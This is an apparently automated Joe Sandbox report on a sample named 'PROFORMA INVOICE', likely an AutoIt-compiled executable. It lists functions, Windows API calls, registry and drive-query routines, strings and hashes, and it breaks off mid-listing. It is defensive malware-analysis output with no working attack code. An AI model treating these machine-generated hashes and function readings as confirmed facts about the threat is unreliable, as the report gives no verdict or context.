Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 334249562a7ae2d2510e72c877d2702ec8e92e90808d17db15a4d41e659a7710
Instruction ID: 7dc7518e34139fd38f2cd778baccfbc2019eac42270e17647caf6ecaf05e35d4
Opcode Fuzzy Hash: 334249562a7ae2d2510e72c877d2702ec8e92e90808d17db15a4d41e659a7710
Instruction Fuzzy Hash: D091BF72408346BFD7109F60DC88E6F7BA9FF84320F140A2DF5629A1A0C735D904EB52

Function 00F7B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00F7B98B
DeleteObject.GDI32(00000000), ref: 00F7B9CD
DeleteObject.GDI32(00000000), ref: 00F7B9D8
DestroyIcon.USER32(00000000), ref: 00F7B9E3
DestroyWindow.USER32(00000000), ref: 00F7B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 00FDD2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FDD2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00FDD711

Part of subcall function 00F7B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F7B759,?,00000000,?,?,?,?,00F7B72B,00000000,?), ref: 00F7BA58

SendMessageW.USER32 ref: 00FDD758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FDD76F
ImageList_Destroy.COMCTL32(00000000), ref: 00FDD785
ImageList_Destroy.COMCTL32(00000000), ref: 00FDD790

Strings

0, xrefs: 00FDD5A5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 63b4461e8667d4ee2ad9722d6aa95749891e206caec44f6cbfbf031f15832edc
Instruction ID: 974fa4f46510001ed117ad571f0635f1d1a1ce9421600b99ecb89c33c480e6bb
Opcode Fuzzy Hash: 63b4461e8667d4ee2ad9722d6aa95749891e206caec44f6cbfbf031f15832edc
Instruction Fuzzy Hash: 1012BF31604241DFDB11CF24C884BA9BBF6FF46314F18456AEA99CB662C731EC45EB92

Function 00FADBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FADBD6
GetDriveTypeW.KERNEL32(?,00FFDC54,?,\\.\,00FFDC00), ref: 00FADCC3
SetErrorMode.KERNEL32(00000000,00FFDC54,?,\\.\,00FFDC00), ref: 00FADE29

Strings

Network, xrefs: 00FADD01
MMC, xrefs: 00FADDE7
ATAPI, xrefs: 00FADD9A
Fibre, xrefs: 00FADDB6
USB, xrefs: 00FADDBD
SATA, xrefs: 00FADDD9
Removable, xrefs: 00FADD15
SCSI, xrefs: 00FADD93
Fixed, xrefs: 00FADD0B
SSD, xrefs: 00FADD50
ATA, xrefs: 00FADDA1
RAID, xrefs: 00FADDC4
iSCSI, xrefs: 00FADDCB
RAMDisk, xrefs: 00FADCED
Unknown, xrefs: 00FADCE3, 00FADD8C
1394, xrefs: 00FADDA8
SSA, xrefs: 00FADDAF
\\.\, xrefs: 00FADC2B
PhysicalDrive, xrefs: 00FADC67
SAS, xrefs: 00FADDD2
Virtual, xrefs: 00FADDEE
FileBackedVirtual, xrefs: 00FADDF5
CDROM, xrefs: 00FADCF7

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2c53155e479a6d7756d03477e2532d2c3c285abbe4fb4b5e3e28a3b1130e689b
Instruction ID: 4c1210a9c85bedda419d565528fb151c5f71af639baee8fe754af98eb1b7d640
Opcode Fuzzy Hash: 2c53155e479a6d7756d03477e2532d2c3c285abbe4fb4b5e3e28a3b1130e689b
Instruction Fuzzy Hash: F851C1B1648302EBC700DF11CCC2A29B7A0FFAA724B14481DF1979FA69DB68D945F752

Function 00F6CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F6CC68
__wcsnicmp.LIBCMT ref: 00F6CC80
__wcsnicmp.LIBCMT ref: 00F6CC98
__wcsnicmp.LIBCMT ref: 00F6CCB0
__wcsnicmp.LIBCMT ref: 00F6CCC8
__wcsnicmp.LIBCMT ref: 00F6CCE0
__wcsnicmp.LIBCMT ref: 00F6CCF8
__wcsnicmp.LIBCMT ref: 00F6CD0C
__wcsnicmp.LIBCMT ref: 00F6CD4D
__wcsnicmp.LIBCMT ref: 00F6CD61
__wcsnicmp.LIBCMT ref: 00F6CD75
__wcsnicmp.LIBCMT ref: 00F6CD89

Strings

#include-once, xrefs: 00F6CCC2
Unterminated group of comments, xrefs: 00FD2FB4
#ce, xrefs: 00F6CD83
#comments-end, xrefs: 00F6CD6F
#comments-start, xrefs: 00F6CCF2, 00F6CD47
Cannot parse #include, xrefs: 00FD2FA1
#include, xrefs: 00F6CCDA
Bad directive syntax error, xrefs: 00FD2ECB
#notrayicon, xrefs: 00F6CC7A
#requireadmin, xrefs: 00F6CC92
#OnAutoItStartRegister, xrefs: 00F6CCAA
#pragma compile, xrefs: 00F6CC62
#cs, xrefs: 00F6CD06, 00F6CD5B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: a4240b32a9944b6398809557f1e2f684173a3c7a3fe03bebf2a6ff3a9d814235
Instruction ID: 0e3e439d98188d374cad21f170acc547313aaf7f6b4d98f2cd213c34e75d6876
Opcode Fuzzy Hash: a4240b32a9944b6398809557f1e2f684173a3c7a3fe03bebf2a6ff3a9d814235
Instruction Fuzzy Hash: 1581F771A40209AACB14BF64DC83FFE3769AF25710F044029F985AB186EB65D945F3D1

Function 00FC638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00FFDC00), ref: 00FC6449

Strings

ISCHECKED, xrefs: 00FC6659
ISENABLED, xrefs: 00FC648C
CURRENTTAB, xrefs: 00FC64DD
SENDCOMMANDID, xrefs: 00FC67CA
CHECK, xrefs: 00FC668B
ADDSTRING, xrefs: 00FC6536
SHOWDROPDOWN, xrefs: 00FC6500
HIDEDROPDOWN, xrefs: 00FC6520
ISVISIBLE, xrefs: 00FC6455
DELSTRING, xrefs: 00FC6569
GETLINE, xrefs: 00FC678B
FINDSTRING, xrefs: 00FC6596
GETLINECOUNT, xrefs: 00FC66E4
GETCURRENTSELECTION, xrefs: 00FC6603
GETCURRENTLINE, xrefs: 00FC6704
SELECTSTRING, xrefs: 00FC6626
TABLEFT, xrefs: 00FC64A7
GETSELECTED, xrefs: 00FC66C1
SETCURRENTSELECTION, xrefs: 00FC65D6
UNCHECK, xrefs: 00FC66A1
EDITPASTE, xrefs: 00FC675B
TABRIGHT, xrefs: 00FC64BD
GETCURRENTCOL, xrefs: 00FC6724

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 6a72e2557aa5a207952b591f1388a5d2cde66a3e36dc8471aa069b7dc6db3578
Instruction ID: 784b28240c0214135c94e27b39e1ef1e2f47fcaf9409ae694414882d6f96239b
Opcode Fuzzy Hash: 6a72e2557aa5a207952b591f1388a5d2cde66a3e36dc8471aa069b7dc6db3578
Instruction Fuzzy Hash: D4C176346082468BCA04EF10CA52F6E7799BF94354F14485DF885DB3E6DB28ED4AFB42

Function 00FCD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00FCD5AE
SetTextColor.GDI32(?,?), ref: 00FCD5B2
GetSysColorBrush.USER32(0000000F), ref: 00FCD5C8
GetSysColor.USER32(0000000F), ref: 00FCD5D3
CreateSolidBrush.GDI32(?), ref: 00FCD5D8
GetSysColor.USER32(00000011), ref: 00FCD5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FCD5FE
SelectObject.GDI32(?,00000000), ref: 00FCD60F
SetBkColor.GDI32(?,00000000), ref: 00FCD618
SelectObject.GDI32(?,?), ref: 00FCD625
InflateRect.USER32(?,000000FF,000000FF), ref: 00FCD644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FCD65B
GetWindowLongW.USER32(00000000,000000F0), ref: 00FCD670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FCD698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FCD6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 00FCD6DD
DrawFocusRect.USER32(?,?), ref: 00FCD6E8
GetSysColor.USER32(00000011), ref: 00FCD6F6
SetTextColor.GDI32(?,00000000), ref: 00FCD6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00FCD712
SelectObject.GDI32(?,00FCD2A5), ref: 00FCD729
DeleteObject.GDI32(?), ref: 00FCD734
SelectObject.GDI32(?,?), ref: 00FCD73A
DeleteObject.GDI32(?), ref: 00FCD73F
SetTextColor.GDI32(?,?), ref: 00FCD745
SetBkColor.GDI32(?,?), ref: 00FCD74F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: c486c2b4c6e13ffd1f58fc51dbb680ccd215153bd614a3c7a0b6efce20e3ca2f
Instruction ID: 91c243ad253879a05b766d29b52b64e22b2fbea19b9947d470889fbc29918ad5
Opcode Fuzzy Hash: c486c2b4c6e13ffd1f58fc51dbb680ccd215153bd614a3c7a0b6efce20e3ca2f
Instruction Fuzzy Hash: AF518D72900248BFDF10AFA8DD89EAE7B79FF08320F154515F915AB2A0D7759A00EF50

Function 00FCB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FCB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FCB7C1
CharNextW.USER32(0000014E), ref: 00FCB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FCB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FCB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FCB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00FCB875
SetWindowTextW.USER32(?,0000014E), ref: 00FCB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00FCB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 00FCB90E
_memset.LIBCMT ref: 00FCB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00FCB97C
_memset.LIBCMT ref: 00FCB9DB
SendMessageW.USER32 ref: 00FCBA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 00FCBA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 00FCBB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 00FCBB2C
GetMenuItemInfoW.USER32(?), ref: 00FCBB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FCBBA3
DrawMenuBar.USER32(?), ref: 00FCBBB2
SetWindowTextW.USER32(?,0000014E), ref: 00FCBBDA

Strings

0, xrefs: 00FCBB4F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 4be3c063ed94a002754cf3554bdc922214d99c271d3bf9a8118a3aef51442941
Instruction ID: 443e314064ef079f8546e2f2ffd3be18a5ffecbc6cb1724a31470f59bae19c98
Opcode Fuzzy Hash: 4be3c063ed94a002754cf3554bdc922214d99c271d3bf9a8118a3aef51442941
Instruction Fuzzy Hash: CAE1AE79900219ABDF209FA1CD86FEE7B78FF45720F10815AF919AB190D7748A41EF60

Function 00FC764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00FC778A
GetDesktopWindow.USER32 ref: 00FC779F
GetWindowRect.USER32(00000000), ref: 00FC77A6
GetWindowLongW.USER32(?,000000F0), ref: 00FC7808
DestroyWindow.USER32(?), ref: 00FC7834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FC785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FC787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00FC78A1
SendMessageW.USER32(?,00000421,?,?), ref: 00FC78B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00FC78C9
IsWindowVisible.USER32(?), ref: 00FC78E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00FC7904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00FC7918
GetWindowRect.USER32(?,?), ref: 00FC7930
MonitorFromPoint.USER32(?,?,00000002), ref: 00FC7956
GetMonitorInfoW.USER32 ref: 00FC7970
CopyRect.USER32(?,?), ref: 00FC7987
SendMessageW.USER32(?,00000412,00000000), ref: 00FC79F2

Strings

0, xrefs: 00FC7735
(, xrefs: 00FC7965
tooltips_class32, xrefs: 00FC7856

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: e6fd01f67c8c22dbe0eb602fbadcd8fe60a5985ed9550b82748fc90753a351b6
Instruction ID: 5958122af3da4c53a25ad67afedab8814cdfca062597041530552b1c9b22cc6f
Opcode Fuzzy Hash: e6fd01f67c8c22dbe0eb602fbadcd8fe60a5985ed9550b82748fc90753a351b6
Instruction Fuzzy Hash: B0B14B71608341AFDB04EF64C989B5ABBE5BF88310F00891DF5999B291D774E805EF92

Function 00F7A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F7A939
GetSystemMetrics.USER32(00000007), ref: 00F7A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F7A96C
GetSystemMetrics.USER32(00000008), ref: 00F7A974
GetSystemMetrics.USER32(00000004), ref: 00F7A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F7A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00F7A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F7A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F7AA0D
GetClientRect.USER32(00000000,000000FF), ref: 00F7AA2B
GetStockObject.GDI32(00000011), ref: 00F7AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F7AA52

Part of subcall function 00F7B63C: GetCursorPos.USER32(000000FF), ref: 00F7B64F
Part of subcall function 00F7B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00F7B66C
Part of subcall function 00F7B63C: GetAsyncKeyState.USER32(00000001), ref: 00F7B691
Part of subcall function 00F7B63C: GetAsyncKeyState.USER32(00000002), ref: 00F7B69F

SetTimer.USER32(00000000,00000000,00000028,00F7AB87), ref: 00F7AA79

Strings

AutoIt v3 GUI, xrefs: 00F7A9F1

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b32547cd785719e9d7c8896e55f24a05cbec40a0f4b9df809ac7b41662e72675
Instruction ID: 16219272e77c9c39563fa96da688a38d34db83f227c90563d2204c8349869c23
Opcode Fuzzy Hash: b32547cd785719e9d7c8896e55f24a05cbec40a0f4b9df809ac7b41662e72675
Instruction Fuzzy Hash: 4DB19471A0020ADFDB24DFA8CC45BAD7BB5FB48314F15811AFA19EB290D738D840EB52

Function 00F62EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00F62F7A
IsWindow.USER32(?), ref: 00FD22FD

Strings

ACTIVE, xrefs: 00FD20CC
REGEXPTITLE, xrefs: 00FD20F8
LAST, xrefs: 00FD20B6
CLASS, xrefs: 00FD2128
ALL, xrefs: 00FD2264
REGEXPCLASS, xrefs: 00FD2149
INSTANCE, xrefs: 00FD223C
HANDLE, xrefs: 00FD20E2
TITLE, xrefs: 00FD2292

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: 5a8773ac8bc028cca971724a01441689aea006ff2f8963d4c24b53f8a8adc0d5
Instruction ID: c0c3b16564a2b4ace80fdb5a3b967c6a4119f3d83f4c98d406c19f655731d97d
Opcode Fuzzy Hash: 5a8773ac8bc028cca971724a01441689aea006ff2f8963d4c24b53f8a8adc0d5
Instruction Fuzzy Hash: C4D12830504246DBCB44EF10CC81AAABBB5BF64310F144A1EF499976A1DB34E99AFBD1

Function 00FC3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FC3735
RegCreateKeyExW.ADVAPI32(?,?,00000000,00FFDC00,00000000,?,00000000,?,?), ref: 00FC37A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00FC37EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00FC3874
RegCloseKey.ADVAPI32(?), ref: 00FC3B94
RegCloseKey.ADVAPI32(00000000), ref: 00FC3BA1

Strings

REG_QWORD, xrefs: 00FC3AE2
REG_BINARY, xrefs: 00FC3B2F
REG_DWORD, xrefs: 00FC3A65
REG_EXPAND_SZ, xrefs: 00FC3811
REG_SZ, xrefs: 00FC38B2
REG_MULTI_SZ, xrefs: 00FC395C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 5f043177b746341c3dfbe46eb39046363578457c7fa750dee3af5f5d0ec3ea78
Instruction ID: 8b7f134e4c74293ade41f4e200eaad7d5bf24921db1d814a896b18a2e99b5692
Opcode Fuzzy Hash: 5f043177b746341c3dfbe46eb39046363578457c7fa750dee3af5f5d0ec3ea78
Instruction Fuzzy Hash: 48026D756046019FDB14EF14C952E2AB7E9FF88720F04845DF99A9B3A1CB34ED05EB82

Function 00FC6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00FC6C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FC6D16

Strings

SELECTALL, xrefs: 00FC6D75
FINDITEM, xrefs: 00FC6E81
SELECTCLEAR, xrefs: 00FC6D8D
VIEWCHANGE, xrefs: 00FC6ECD
ISSELECTED, xrefs: 00FC6D21
DESELECT, xrefs: 00FC6DFC
GETITEMCOUNT, xrefs: 00FC6C84
GETSELECTED, xrefs: 00FC6E3C
GETSELECTEDCOUNT, xrefs: 00FC6CF9
GETSUBITEMCOUNT, xrefs: 00FC6CA1
GETTEXT, xrefs: 00FC6CBF
SELECTINVERT, xrefs: 00FC6DDE
SELECT, xrefs: 00FC6DA8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 74f5c2fdc68d389b5667520338696de24e83c9856926d227d465dab973a02b22
Instruction ID: 34ddc8d03b2e301e444b1152aa26ef0983367593002a9c8f853952f9e50552eb
Opcode Fuzzy Hash: 74f5c2fdc68d389b5667520338696de24e83c9856926d227d465dab973a02b22
Instruction Fuzzy Hash: D0A164346182429BCB14EF14CE52F6A73A5FF94314F14495EB8969B3D2DB34EC05EB41

Function 00F9CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00F9CF91
__swprintf.LIBCMT ref: 00F9D032
_wcscmp.LIBCMT ref: 00F9D045
